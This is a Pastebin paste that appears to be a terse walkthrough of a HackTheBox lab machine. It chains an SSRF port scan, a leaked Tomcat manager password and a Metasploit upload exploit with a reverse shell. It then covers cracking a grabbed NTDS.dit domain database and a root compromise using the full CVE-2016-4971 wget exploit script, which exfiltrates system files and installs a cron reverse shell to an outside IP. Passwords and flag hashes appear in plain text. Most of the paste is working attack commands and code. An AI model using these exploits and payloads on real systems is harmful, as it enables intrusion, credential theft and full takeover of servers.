API tools faq
paste
Guest User

Untitled

a guest
Jan 7th, 2018
94
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.73 KB | None | 0 0
raw download clone embed print report
  1. http://10.10.10.55:60000/url.php?path=
  2. put http://localhost:80
  3. get request in burp scan port from 1 to 1000
  4. reference :http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
  5. http://10.10.10.55:60000/url.php?path=http://localhost:888
  6. u will get backup
  7. http://10.10.10.55:60000/url.php?path=http://localhost:888?doc=backup
  8. see source of it
  9. <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
  10. msfconsole
  11. use exploit/multi/http/tomcat_mgr_upload
  12. set HttpPassword 3@g01PdhB!
  13. set HttpUsername admin
  14. set RHOST 10.10.10.55
  15. set RPORT 8080
  16. set payload linux/x86/shell/reverse_tcp
  17. set LHOST 10.10.15.104
  18. set target 2
  19. run
  20.  
  21. python -c 'import pty;pty.spawn("/bin/sh")'
  22. cd /home/tomcat/to_archive/pentest_data
  23. u will see
  24. total 28312
  25. drwxr-xr-x 2 tomcat tomcat 4096 Jul 21 13:13 .
  26. drwxr-xr-x 3 tomcat tomcat 4096 Jul 21 13:13 ..
  27. -rw-r--r— 1 tomcat tomcat 16793600 Jul 21 12:16 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
  28. -rw-r--r— 1 tomcat tomcat 12189696 Jul 21 12:16 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
  29. tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$
  30. download .dit and .bin file in your pc
  31. https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
  32. crack it u will get pass
  33.  
  34.  
  35. su atanas
  36. f16tomcat!
  37.  
  38. 93f844f50491ef797c9c1b601b4bece8
  39.  
  40. for root goto /tmp
  41. on your pc goto /tmp file
  42. nano .wgetrc
  43. post_file = /root/root.txt
  44. output_document = /etc/cron.d/wget-root-shell
  45.  
  46. https://www.exploit-db.com/exploits/40064/
  47. see this exploit
  48.  
  49.  
  50. nano wget-exploit.py
  51. #!/usr/bin/env python
  52.  
  53. #
  54. # Wget 1.18 < Arbitrary File Upload Exploit
  55. # Dawid Golunski
  56. # dawid( at )legalhackers.com
  57. #
  58. # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
  59. #
  60. # CVE-2016-4971
  61. #
  62.  
  63. import SimpleHTTPServer
  64. import SocketServer
  65. import socket;
  66.  
  67. class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
  68. def do_GET(self):
  69. # This takes care of sending .wgetrc
  70.  
  71. print "We have a volunteer requesting " + self.path + " by GET :)\n"
  72. if "Wget" not in self.headers.getheader('User-Agent'):
  73. print "But it's not a Wget :( \n"
  74. self.send_response(200)
  75. self.end_headers()
  76. self.wfile.write("Nothing to see here...")
  77. return
  78.  
  79. print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
  80. self.send_response(301)
  81. new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
  82. print "Sending redirect to %s \n"%(new_path)
  83. self.send_header('Location', new_path)
  84. self.end_headers()
  85.  
  86. def do_POST(self):
  87. # In here we will receive extracted file and install a PoC cronjob
  88.  
  89. print "We have a volunteer requesting " + self.path + " by POST :)\n"
  90. if "Wget" not in self.headers.getheader('User-Agent'):
  91. print "But it's not a Wget :( \n"
  92. self.send_response(200)
  93. self.end_headers()
  94. self.wfile.write("Nothing to see here...")
  95. return
  96.  
  97. content_len = int(self.headers.getheader('content-length', 0))
  98. post_body = self.rfile.read(content_len)
  99. print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
  100.  
  101. print "Sending back a cronjob script as a thank-you for the file..."
  102. print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
  103. self.send_response(200)
  104. self.send_header('Content-type', 'text/plain')
  105. self.end_headers()
  106. self.wfile.write(ROOT_CRON)
  107.  
  108. print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
  109.  
  110. return
  111.  
  112. HTTP_LISTEN_IP = ''
  113. HTTP_LISTEN_PORT = 80
  114. FTP_HOST = '10.10.14.2'
  115. FTP_PORT = 21
  116.  
  117. ROOT_CRON = "* * * * * root bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"
  118.  
  119. handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
  120.  
  121. print "Ready? Is your FTP server running?"
  122.  
  123. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  124. result = sock.connect_ex((FTP_HOST, FTP_PORT))
  125. if result == 0:
  126. print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
  127. else:
  128. print "FTP is down :( Exiting."
  129. exit(1)
  130.  
  131. print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
  132.  
  133. handler.serve_forever()
  134.  
  135. save it change ftp ip to ur vpn ip
  136. than upload that file on server in /tmp file
  137. open new msfconsole
  138. use auxiliary/server/ftp
  139. set FTPROOT /tmp
  140. set LHOST your ip
  141. run
  142. than goto server
  143. after u upload
  144. authbind python wget-exploit.py
  145.  
  146.  
  147. 950d1425795dfd38272c93ccbb63ae2c
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!